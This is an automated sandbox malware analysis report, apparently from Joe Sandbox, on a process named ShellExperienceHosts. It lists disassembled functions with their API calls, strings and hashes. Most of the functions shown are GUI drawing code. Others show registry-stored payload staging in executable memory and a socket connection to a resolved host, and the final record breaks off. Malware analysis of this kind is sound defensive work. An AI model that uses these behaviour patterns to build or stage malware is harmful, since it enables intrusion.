                                                                            • Instruction Fuzzy Hash: 5451D87AB002259FD711CF69C9C0D6AFBA9FF4422471886ACE919CB704DB35F991CB90
                                                                            Function 6C741395 Relevance: 77.3, APIs: 43, Strings: 1, Instructions: 298COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 94 6c741395-6c7413b4 call 6c7a11d2 GetSysColor 97 6c7413c5 94->97 98 6c7413b6-6c7413c0 GetSysColor 94->98 100 6c7413c7-6c7413d7 GetSysColor 97->100 98->97 99 6c7413c2-6c7413c3 98->99 99->100 101 6c7413d9-6c7413e3 GetSysColor 100->101 102 6c7413ea 100->102 101->102 104 6c7413e5-6c7413e8 101->104 103 6c7413ec-6c741523 call 6c6e2c90 GetDeviceCaps GetSysColor * 21 102->103 107 6c741525-6c74152c 103->107 108 6c74152e-6c74153a GetSysColor 103->108 104->103 109 6c741540-6c741556 GetSysColorBrush 107->109 108->109 110 6c74155c-6c741569 GetSysColorBrush 109->110 111 6c7417ad-6c7417b2 call 6c75e7dc 109->111 110->111 112 6c74156f-6c74157c GetSysColorBrush 110->112 112->111 114 6c741582-6c7416cd call 6c6e1e5c CreateSolidBrush call 6c6e1e06 call 6c6e1e5c CreateSolidBrush call 6c6e1e06 call 6c6e1e5c CreateSolidBrush call 6c6e1e06 call 6c6e1e5c CreateSolidBrush call 6c6e1e06 call 6c6e1e5c CreateSolidBrush call 6c6e1e06 call 6c6e1e5c CreateSolidBrush call 6c6e1e06 call 6c6e1e5c CreateSolidBrush call 6c6e1e06 call 6c6e1e5c CreatePen call 6c6e1e06 call 6c6e1e5c CreatePen call 6c6e1e06 call 6c6e1e5c CreatePen call 6c6e1e06 112->114 156 6c7416dc-6c7416e3 114->156 157 6c7416cf-6c7416d3 114->157 159 6c7416e5-6c741747 CreateSolidBrush call 6c6e1e06 156->159 160 6c741749-6c741755 call 6c742363 156->160 157->156 158 6c7416d5-6c7416d7 call 6c6e1e5c 157->158 158->156 166 6c741790-6c7417ac call 6c7a9c4c call 6c6e2ce5 call 6c7a12aa 159->166 160->111 167 6c741757-6c74178b call 6c6e1e06 CreatePatternBrush call 6c6e1e06 call 6c6b1c18 160->167 167->166
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C74139C
                                                                            • GetSysColor.USER32(00000016), ref: 6C7413A5
                                                                            • GetSysColor.USER32(0000000F), ref: 6C7413B8
                                                                            • GetSysColor.USER32(00000015), ref: 6C7413CF
                                                                            • GetSysColor.USER32(0000000F), ref: 6C7413DB
                                                                            • GetDeviceCaps.GDI32(?,0000000C), ref: 6C741403
                                                                            • GetSysColor.USER32(0000000F), ref: 6C741411
                                                                            • GetSysColor.USER32(00000010), ref: 6C74141F
                                                                            • GetSysColor.USER32(00000015), ref: 6C74142D
                                                                            • GetSysColor.USER32(00000016), ref: 6C74143B
                                                                            • GetSysColor.USER32(00000014), ref: 6C741449
                                                                            • GetSysColor.USER32(00000012), ref: 6C741457
                                                                            • GetSysColor.USER32(00000011), ref: 6C741465
                                                                            • GetSysColor.USER32(00000006), ref: 6C741470
                                                                            • GetSysColor.USER32(0000000D), ref: 6C74147B
                                                                            • GetSysColor.USER32(0000000E), ref: 6C741486
                                                                            • GetSysColor.USER32(00000005), ref: 6C741491
                                                                            • GetSysColor.USER32(00000008), ref: 6C74149F
                                                                            • GetSysColor.USER32(00000009), ref: 6C7414AA
                                                                            • GetSysColor.USER32(00000007), ref: 6C7414B5
                                                                            • GetSysColor.USER32(00000002), ref: 6C7414C0
                                                                            • GetSysColor.USER32(00000003), ref: 6C7414CB
                                                                            • GetSysColor.USER32(0000001B), ref: 6C7414D9
                                                                            • GetSysColor.USER32(0000001C), ref: 6C7414E7
                                                                            • GetSysColor.USER32(0000000A), ref: 6C7414F5
                                                                            • GetSysColor.USER32(0000000B), ref: 6C741503
                                                                            • GetSysColor.USER32(00000013), ref: 6C741511
                                                                            • GetSysColor.USER32(0000001A), ref: 6C74153A
                                                                            • GetSysColorBrush.USER32(00000010), ref: 6C74154B
                                                                            • GetSysColorBrush.USER32(00000014), ref: 6C74155E
                                                                            • GetSysColorBrush.USER32(00000005), ref: 6C741571
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C741592
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C7415B0
                                                                            • CreateSolidBrush.GDI32(00000006), ref: 6C7415CE
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C7415EF
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C74160D
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C74162B
                                                                            • CreateSolidBrush.GDI32(?), ref: 6C741649
                                                                            • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C74166F
                                                                            • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C741693
                                                                            • CreatePen.GDI32(00000000,00000001,00000000), ref: 6C7416B7
                                                                            • CreateSolidBrush.GDI32(6C6E6636), ref: 6C741735
                                                                            • CreatePatternBrush.GDI32(00000000), ref: 6C741773
                                                                              • Part of subcall function 6C6E1E5C: DeleteObject.GDI32(00000000), ref: 6C6E1E6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
                                                                            • String ID: 6fnl
                                                                            • API String ID: 3754413814-119841961
                                                                            • Opcode ID: 5a183ebb0c3b7d4bfcb00b17f80df01c258361476bac804ce02ed614a10033b6
                                                                            • Instruction ID: bfa93cd3b5d47224f51e9a9ac71f91febf13c079c123cf05f86aba94005378aa
                                                                            • Opcode Fuzzy Hash: 5a183ebb0c3b7d4bfcb00b17f80df01c258361476bac804ce02ed614a10033b6
                                                                            • Instruction Fuzzy Hash: 51C19B70B00B02BFDF15AFB08958799BB71BB0A709F004125F229D7A81DF74A965DBE4
                                                                            Function 6C7417B3 Relevance: 68.6, APIs: 34, Strings: 5, Instructions: 356stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 905 6c7417b3-6c741809 call 6c7a123b call 6c6e2c90 GetDeviceCaps 910 6c741821-6c741829 905->910 911 6c74180b-6c741817 905->911 913 6c74183f-6c741847 910->913 914 6c74182b-6c74182f 910->914 911->910 912 6c741819 911->912 912->910 916 6c74185d-6c741865 913->916 917 6c741849-6c74184d 913->917 914->913 915 6c741831-6c741839 call 6c6e1e32 DeleteObject 914->915 915->913 918 6c741867-6c74186b 916->918 919 6c74187b-6c741883 916->919 917->916 921 6c74184f-6c741857 call 6c6e1e32 DeleteObject 917->921 918->919 922 6c74186d-6c741875 call 6c6e1e32 DeleteObject 918->922 923 6c741885-6c741889 919->923 924 6c741899-6c7418a1 919->924 921->916 922->919 923->924 928 6c74188b-6c741893 call 6c6e1e32 DeleteObject 923->928 929 6c7418b7-6c7418bf 924->929 930 6c7418a3-6c7418a7 924->930 928->924 935 6c7418d5-6c7418dd 929->935 936 6c7418c1-6c7418c5 929->936 930->929 934 6c7418a9-6c7418b1 call 6c6e1e32 DeleteObject 930->934 934->929 938 6c7418f3-6c7418fb 935->938 939 6c7418df-6c7418e3 935->939 936->935 937 6c7418c7-6c7418cf call 6c6e1e32 DeleteObject 936->937 937->935 944 6c741911-6c741919 938->944 945 6c7418fd-6c741901 938->945 939->938 943 6c7418e5-6c7418ed call 6c6e1e32 DeleteObject 939->943 943->938 950 6c74192f-6c741937 944->950 951 6c74191b-6c74191f 944->951 945->944 949 6c741903-6c74190b call 6c6e1e32 DeleteObject 945->949 949->944 952 6c74194d-6c7419aa call 6c742264 call 6c84e940 GetTextCharsetInfo 950->952 953 6c741939-6c74193d 950->953 951->950 956 6c741921-6c741929 call 6c6e1e32 DeleteObject 951->956 967 6c7419b1-6c7419b5 952->967 968 6c7419ac-6c7419af 952->968 953->952 958 6c74193f-6c741947 call 6c6e1e32 DeleteObject 953->958 956->950 958->952 969 6c7419b8-6c7419de lstrcpyW 967->969 970 6c7419b7 967->970 968->969 971 6c7419e0-6c7419e7 969->971 972 6c741a4c-6c741a8d CreateFontIndirectW call 6c6e1e06 call 6c85ea62 969->972 970->969 971->972 973 6c7419e9-6c741a03 EnumFontFamiliesW 971->973 983 6c741a94-6c741b9a CreateFontIndirectW call 6c6e1e06 call 6c742264 CreateFontIndirectW call 6c6e1e06 CreateFontIndirectW call 6c6e1e06 CreateFontIndirectW call 6c6e1e06 GetSystemMetrics lstrcpyW CreateFontIndirectW call 6c6e1e06 GetStockObject 972->983 984 6c741a8f-6c741a91 972->984 975 6c741a05-6c741a18 lstrcpyW 973->975 976 6c741a1a-6c741a37 EnumFontFamiliesW 973->976 975->972 978 6c741a40 976->978 979 6c741a39-6c741a3e 976->979 981 6c741a45-6c741a46 lstrcpyW 978->981 979->981 981->972 997 6c741ba0-6c741baf GetObjectW 983->997 998 6c741c6a-6c741c77 call 6c7422a5 983->998 984->983 997->998 1000 6c741bb5-6c741c65 lstrcpyW CreateFontIndirectW call 6c6e1e06 CreateFontIndirectW call 6c6e1e06 GetObjectW CreateFontIndirectW call 6c6e1e06 CreateFontIndirectW call 6c6e1e06 997->1000 1003 6c741ca2-6c741ca4 998->1003 1000->998 1005 6c741ca6-6c741cb6 call 6c6b1c18 1003->1005 1006 6c741c79-6c741c80 1003->1006 1012 6c741cbb-6c741ccb call 6c6e2ce5 call 6c7a12be 1005->1012 1009 6c741c82-6c741c8c call 6c738cbf 1006->1009 1010 6c741ccc-6c741cd1 call 6c75e7dc 1006->1010 1009->1003 1022 6c741c8e-6c741c9e 1009->1022 1022->1003
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C7417BD
                                                                              • Part of subcall function 6C6E2C90: __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                              • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            • GetDeviceCaps.GDI32(?,00000058), ref: 6C7417DD
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741839
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741857
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741875
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741893
                                                                            • DeleteObject.GDI32(00000000), ref: 6C7418B1
                                                                            • DeleteObject.GDI32(00000000), ref: 6C7418CF
                                                                            • DeleteObject.GDI32(00000000), ref: 6C7418ED
                                                                            • DeleteObject.GDI32(00000000), ref: 6C74190B
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741929
                                                                            • DeleteObject.GDI32(00000000), ref: 6C741947
                                                                            • GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6C74197F
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 6C7419D4
                                                                            • EnumFontFamiliesW.GDI32(?,00000000,6C742460,Segoe UI), ref: 6C7419FB
                                                                            • lstrcpyW.KERNEL32(?,Segoe UI), ref: 6C741A0E
                                                                            • EnumFontFamiliesW.GDI32(?,00000000,6C742460,Tahoma), ref: 6C741A2C
                                                                            • lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6C741A46
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741A50
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741A98
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741AD7
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741B03
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741B24
                                                                            • GetSystemMetrics.USER32(00000048), ref: 6C741B43
                                                                            • lstrcpyW.KERNEL32(?,Marlett), ref: 6C741B56
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741B60
                                                                            • GetStockObject.GDI32(00000011), ref: 6C741B8C
                                                                            • GetObjectW.GDI32(00000000,0000005C,?), ref: 6C741BA7
                                                                            • lstrcpyW.KERNEL32(?,Arial), ref: 6C741BE8
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741BF2
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741C0B
                                                                            • GetObjectW.GDI32(?,0000005C,?), ref: 6C741C29
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741C37
                                                                            • CreateFontIndirectW.GDI32(?), ref: 6C741C58
                                                                              • Part of subcall function 6C7422A5: __EH_prolog3_GS.LIBCMT ref: 6C7422AC
                                                                              • Part of subcall function 6C7422A5: GetTextMetricsW.GDI32(?,?), ref: 6C7422E1
                                                                              • Part of subcall function 6C7422A5: GetTextMetricsW.GDI32(?,?), ref: 6C742321
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_$CapsCharsetDeviceH_prolog3InfoStockSystemWindow
                                                                            • String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
                                                                            • API String ID: 2837096512-1395034203
                                                                            • Opcode ID: 6855be27efcb44f5997d87932a5b3e986cb5a14da9080e10283b98e20349f5db
                                                                            • Instruction ID: 0c63781321b85fb4def17281bc325271f54ba31eb1bb1dc59a41cd67e3cffd5d
                                                                            • Opcode Fuzzy Hash: 6855be27efcb44f5997d87932a5b3e986cb5a14da9080e10283b98e20349f5db
                                                                            • Instruction Fuzzy Hash: 08E17F71A053499FDF21DFB0CA08BDEBBB8AF06309F00857AE459A7641DB34E949CB54
                                                                            Function 100054C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2401 100054c0-100054d6 2402 100054dc-100054e1 2401->2402 2403 1000580e-10005813 2401->2403 2404 10005707-1000575f VirtualAlloc call 1000c880 call 100067ff 2402->2404 2405 100054e7-1000550f RegOpenKeyExW 2402->2405 2425 10005761-100057a1 call 1000c880 RegCreateKeyW 2404->2425 2426 100057dd-100057ec 2404->2426 2407 10005515-10005538 RegQueryValueExW 2405->2407 2408 100055ba-100055bf 2405->2408 2411 1000553a-10005567 call 100067ff call 1000c800 RegQueryValueExW 2407->2411 2412 100055ad-100055b7 RegCloseKey 2407->2412 2410 100055c2-100055c8 2408->2410 2415 100055e8-100055ea 2410->2415 2416 100055ca-100055cd 2410->2416 2435 10005569-100055a8 VirtualAlloc call 1000c880 2411->2435 2436 100055aa 2411->2436 2412->2408 2417 100055ed-100055ef 2415->2417 2420 100055e4-100055e6 2416->2420 2421 100055cf-100055d7 2416->2421 2422 100055f5-100055fc 2417->2422 2423 100056f8-10005702 2417->2423 2420->2417 2421->2415 2427 100055d9-100055e2 2421->2427 2429 10005611-100056d4 call 1000c800 * 3 call 100067ff call 1000c880 2422->2429 2430 100055fe-1000560b VirtualFree 2422->2430 2428 100057ee-1000580b call 1000721b Sleep call 10002d10 2423->2428 2441 100057a3-100057c4 RegDeleteValueW RegSetValueExW 2425->2441 2442 100057ca-100057d5 RegCloseKey call 100072bb 2425->2442 2426->2428 2427->2410 2427->2420 2446 1000580d 2428->2446 2455 100056e6-100056f5 call 1000680a 2429->2455 2456 100056d6-100056e3 2429->2456 2430->2429 2435->2436 2436->2412 2441->2442 2448 100057da 2442->2448 2446->2403 2448->2426 2460 100056e4 call 100060df 2456->2460 2461 100056e4 call 100031ef 2456->2461 2460->2455 2461->2455
                                                                            APIs
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 10005507
                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 1000552E
                                                                            • _memset.LIBCMT ref: 10005548
                                                                            • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 10005563
                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005586
                                                                            • RegCloseKey.ADVAPI32(?), ref: 100055B1
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 10005605
                                                                            • _memset.LIBCMT ref: 10005669
                                                                            • _memset.LIBCMT ref: 1000568D
                                                                            • _memset.LIBCMT ref: 1000569F
                                                                            • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 10005726
                                                                            • RegCreateKeyW.ADVAPI32(80000001,Console\0,?), ref: 10005799
                                                                            • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 100057AC
                                                                            • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 100057C4
                                                                            • RegCloseKey.KERNEL32(?), ref: 100057CE
                                                                            • Sleep.KERNEL32(00000BB8), ref: 100057FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                            • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                            • API String ID: 354323817-737951744
                                                                            • Opcode ID: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                            • Instruction ID: 005816a77294032e0ea7aedf6318117014c310f5a4f2017eaf50af4860f80873
                                                                            • Opcode Fuzzy Hash: be3d857457f6c34cc49a9ce7b94368c024c206f60fa141a8346ca6c642e4ce58
                                                                            • Instruction Fuzzy Hash: 5891D475A00718ABF710CF60CC84FAB77BAFB88741F508158FA089B245DB75EA40CB51
                                                                            Function 03329E50 Relevance: 33.6, APIs: 18, Strings: 1, Instructions: 314windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2735 3329e50-3329e85 GdipGetImagePixelFormat 2736 3329e87 2735->2736 2737 3329e8a-3329eb1 2735->2737 2736->2737 2738 3329eb3-3329ec3 2737->2738 2739 3329ec9-3329ecf 2737->2739 2738->2739 2740 3329ed1-3329ee1 2739->2740 2741 3329eeb-3329f04 GdipGetImageHeight 2739->2741 2740->2741 2742 3329f06 2741->2742 2743 3329f09-3329f2c GdipGetImageWidth 2741->2743 2742->2743 2744 3329f31-3329f4e call 3329c30 2743->2744 2745 3329f2e 2743->2745 2748 3329f54-3329f68 2744->2748 2749 332a055-332a05a 2744->2749 2745->2744 2750 3329f6e-3329f87 GdipGetImagePaletteSize 2748->2750 2751 332a0cf-332a0d7 2748->2751 2752 332a2a4-332a2ba call 332f00a 2749->2752 2753 3329f89 2750->2753 2754 3329f8c-3329f98 2750->2754 2756 332a20a-332a27b GdipCreateBitmapFromScan0 GdipGetImageGraphicsContext GdipDrawImageI GdipDeleteGraphics GdipDisposeImage 2751->2756 2757 332a0dd-332a11a GdipBitmapLockBits 2751->2757 2753->2754 2759 3329fb2-3329fba 2754->2759 2760 3329f9a-3329fa5 call 3329650 2754->2760 2758 332a281-332a283 2756->2758 2762 332a14a-332a177 2757->2762 2763 332a11c-332a121 2757->2763 2764 332a2a2 2758->2764 2765 332a285 2758->2765 2769 3329fd0-3329fd5 call 3321280 2759->2769 2770 3329fbc-3329fca call 332f673 2759->2770 2760->2759 2784 3329fa7-3329fb0 call 333c660 2760->2784 2766 332a179-332a18e call 33307f2 2762->2766 2767 332a1bf-332a1de GdipBitmapUnlockBits 2762->2767 2771 332a123 2763->2771 2772 332a140-332a145 2763->2772 2764->2752 2775 332a28d-332a2a0 call 332f639 2765->2775 2790 332a200-332a205 call 3321280 2766->2790 2791 332a190-332a197 2766->2791 2767->2758 2778 332a1e4-332a1e7 2767->2778 2781 3329fda-3329fe5 2769->2781 2770->2781 2786 3329fcc-3329fce 2770->2786 2773 332a12b-332a13e call 332f639 2771->2773 2772->2752 2773->2772 2794 332a125 2773->2794 2775->2764 2797 332a287 2775->2797 2778->2758 2788 3329fe7-3329fe9 2781->2788 2784->2788 2786->2788 2795 332a016-332a030 GdipGetImagePalette 2788->2795 2796 3329feb-3329fed 2788->2796 2790->2756 2791->2790 2798 332a1f6-332a1fb call 3321280 2791->2798 2799 332a19e-332a1bd 2791->2799 2800 332a1ec-332a1f1 call 3321280 2791->2800 2794->2773 2805 332a032-332a038 2795->2805 2806 332a03b-332a040 2795->2806 2803 3329fef 2796->2803 2804 332a00c-332a011 2796->2804 2797->2775 2798->2790 2799->2766 2799->2767 2800->2798 2808 3329ff7-332a00a call 332f639 2803->2808 2804->2752 2805->2806 2809 332a042-332a048 2806->2809 2810 332a04a-332a050 call 332cca0 2806->2810 2808->2804 2819 3329ff1 2808->2819 2809->2810 2811 332a05f-332a063 2809->2811 2810->2749 2814 332a0a0-332a0c9 call 3329d80 SetDIBColorTable call 332a320 2811->2814 2815 332a065 2811->2815 2814->2751 2817 332a068-332a098 2815->2817 2817->2817 2820 332a09a 2817->2820 2819->2808 2820->2814
                                                                            APIs
                                                                            • GdipGetImagePixelFormat.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03329E7B
                                                                            • GdipGetImageHeight.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03329EFC
                                                                            • GdipGetImageWidth.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03329F24
                                                                            • GdipGetImagePaletteSize.GDIPLUS(Function_00009A30,?,?,00000000), ref: 03329F7F
                                                                            • _malloc.LIBCMT ref: 03329FC0
                                                                              • Part of subcall function 0332F673: __FF_MSGBANNER.LIBCMT ref: 0332F68C
                                                                              • Part of subcall function 0332F673: __NMSG_WRITE.LIBCMT ref: 0332F693
                                                                              • Part of subcall function 0332F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76), ref: 0332F6B8
                                                                            • _free.LIBCMT ref: 0332A000
                                                                            • GdipGetImagePalette.GDIPLUS(?,00000008,?,?,00000000), ref: 0332A028
                                                                            • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000), ref: 0332A0B7
                                                                            • GdipBitmapLockBits.GDIPLUS(Function_00009A30,?,00000001,?,?,?,00000000), ref: 0332A112
                                                                            • _free.LIBCMT ref: 0332A134
                                                                            • _memcpy_s.LIBCMT ref: 0332A183
                                                                            • GdipBitmapUnlockBits.GDIPLUS(?,?,?,00000000), ref: 0332A1D0
                                                                            • GdipCreateBitmapFromScan0.GDIPLUS(?,?,03345A78,00022009,?,00000000,?,00000000), ref: 0332A22C
                                                                            • GdipGetImageGraphicsContext.GDIPLUS(00000000,00022009,?,00000000), ref: 0332A24C
                                                                            • GdipDrawImageI.GDIPLUS(00000000,Function_00009A30,00000000,00000000,?,00000000), ref: 0332A267
                                                                            • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0332A274
                                                                            • GdipDisposeImage.GDIPLUS(00000000,?,00000000), ref: 0332A27B
                                                                            • _free.LIBCMT ref: 0332A296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Gdip$Image$Bitmap_free$BitsGraphicsPalette$AllocateColorContextCreateDeleteDisposeDrawFormatFromHeapHeightLockPixelScan0SizeTableUnlockWidth_malloc_memcpy_s
                                                                            • String ID: &
                                                                            • API String ID: 640422297-3042966939
                                                                            • Opcode ID: 37a9327bf609baf9abd6531b384af721a5704ee82c82673f6d0916c56fa7f7b8
                                                                            • Instruction ID: 47ed8ac7e8745c6e6ccb0b1dc6e32e3979d83bff73c0c478a13d735ca79f8936
                                                                            • Opcode Fuzzy Hash: 37a9327bf609baf9abd6531b384af721a5704ee82c82673f6d0916c56fa7f7b8
                                                                            • Instruction Fuzzy Hash: 6BD154F5A002299FDB20DF55DCC0B9ABBB8FF48304F0485ADE609A7201DB74A995CF65
                                                                            Function 10002D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • ResetEvent.KERNEL32(?), ref: 10002D9B
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10002DA7
                                                                            • timeGetTime.WINMM ref: 10002DAD
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 10002DDA
                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 10002E06
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E12
                                                                            • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 10002E31
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 10002E3D
                                                                            • gethostbyname.WS2_32(00000000), ref: 10002E4B
                                                                            • htons.WS2_32(?), ref: 10002E6D
                                                                            • connect.WS2_32(?,?,00000010), ref: 10002E8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                            • String ID: 0u
                                                                            • API String ID: 640718063-3203441087
                                                                            • Opcode ID: 94c689521af4947466c8b86645af49a3b04e56d54b71338c9307917d991564e9
                                                                            • Instruction ID: d5696d751933d4553be470da2890fc26df070c3c16b6f4ec0f7763c80930fe30
